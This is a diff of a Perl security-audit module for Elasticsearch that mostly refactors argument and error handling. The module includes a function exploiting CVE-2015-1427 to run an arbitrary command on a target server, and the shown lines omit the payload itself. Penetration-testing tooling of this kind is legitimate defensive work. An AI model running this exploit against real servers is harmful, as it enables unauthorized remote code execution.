@@ -1,5 +1,5 @@
 #
-# $Id: Elasticsearch.pm,v 508610fe2b1a 2015/10/27 19:01:31 gomor $
+# $Id: Elasticsearch.pm,v 1cdea52670de 2016/01/02 17:14:57 gomor $
 #
 # audit::elasticsearch Brik
 #
@@ -11,8 +11,10 @@ use base qw(Metabrik::Client::Www);
 
 sub brik_properties {
    return {
-      revision => '$Revision: 508610fe2b1a $',
-      tags => [ qw(unstable audit elasticsearch) ],
+      revision => '$Revision: 1cdea52670de $',
+      tags => [ qw(unstable) ],
+      author => 'GomoR <GomoR[at]metabrik.org>',
+      license => 'http://opensource.org/licenses/BSD-3-Clause',
       attributes => {
          uri => [ qw(uri) ],
       },
@@ -38,9 +40,7 @@ sub check_cve_2015_1427_rce {
    my ($uri) = @_;
 
    $uri ||= $self->uri;
-   if (! defined($uri)) {
-      return $self->log->error($self->brik_help_run('check_cve_2015_1427_rce'));
-   }
+   $self->brik_help_run_undef_arg('check_cve_2015_1427_rce', $uri) or return;
 
    $uri =~ s{^(http://[^:]+:\d+).*}{$1};
    if ($uri !~ m{^http://[^:]+:\d+$}) {
@@ -57,16 +57,14 @@ sub check_cve_2015_1427_rce {
    $self->debug && $self->log->debug("check_cve_2015_1427_rce: POSTing to ".
       "url [$url] with data [$check]");
 
-   my $reply = $self->post($check, $url)
-      or return $self->log->error("check_cve_2015_1427_rce: post error");
+   my $reply = $self->post($check, $url) or return;
 
    my $content = $reply->{content}
       or return $self->log->error("check_cve_2015_1427_rce: no content found");
 
    my $sj = Metabrik::String::Json->new_from_brik_init($self) or return;
 
-   my $ref = $sj->decode($content)
-      or return $self->log->error("check_cve_2015_1427_rce: decode error");
+   my $ref = $sj->decode($content) or return;
 
    if ($ref->{hits} && $ref->{hits}{hits} && $ref->{hits}{hits}[0]
    &&  $ref->{hits}{hits}[0]{fields}
@@ -85,20 +83,17 @@ sub check_cve_2015_1427_rce {
    return $self->log->error("check_cve_2015_1427_rce: unknown error");
 }
 
+#
 # Thanks to: https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
 # But they stole our logo font with bleeding letters ;)
+#
 sub exploit_cve_2015_1427_rce {
    my $self = shift;
    my ($command, $uri) = @_;
 
-   if (! defined($command)) {
-      return $self->log->error($self->brik_help_run('exploit_cve_2015_1427_rce'));
-   }
-
    $uri ||= $self->uri;
-   if (! defined($uri)) {
-      return $self->log->error($self->brik_help_run('exploit_cve_2015_1427_rce'));
-   }
+   $self->brik_help_run_undef_arg('exploit_cve_2015_1427_rce', $command) or return;
+   $self->brik_help_run_undef_arg('exploit_cve_2015_1427_rce', $uri) or return;
 
    $uri =~ s{^(http://[^:]+:\d+).*}{$1};
    if ($uri !~ m{^http://[^:]+:\d+$}) {
@@ -117,16 +112,14 @@ sub exploit_cve_2015_1427_rce {
    $self->debug && $self->log->debug("exploit_cve_2015_1427_rce: POSTing to ".
       "url [$url] with data [$check]");
 
-   my $reply = $self->post($check, $url)
-      or return $self->log->error("exploit_cve_2015_1427_rce: post error");
+   my $reply = $self->post($check, $url) or return;
 
    my $content = $reply->{content}
       or return $self->log->error("exploit_cve_2015_1427_rce: no content found");
 
    my $sj = Metabrik::String::Json->new_from_brik_init($self) or return;
 
-   my $ref = $sj->decode($content)
-      or return $self->log->error("exploit_cve_2015_1427_rce: decode error");
+   my $ref = $sj->decode($content) or return;
 
    if ($ref->{hits} && $ref->{hits}{hits} && $ref->{hits}{hits}[0]
    &&  $ref->{hits}{hits}[0]{fields}
@@ -165,7 +158,7 @@ Metabrik::Audit::Elasticsearch - audit::elasticsearch Brik
 
 =head1 COPYRIGHT AND LICENSE
 
-Copyright (c) 2014-2015, Patrice E<lt>GomoRE<gt> Auffret
+Copyright (c) 2014-2016, Patrice E<lt>GomoRE<gt> Auffret
 
 You may distribute this module under the terms of The BSD 3-Clause License.
 See LICENSE file in the source distribution archive.
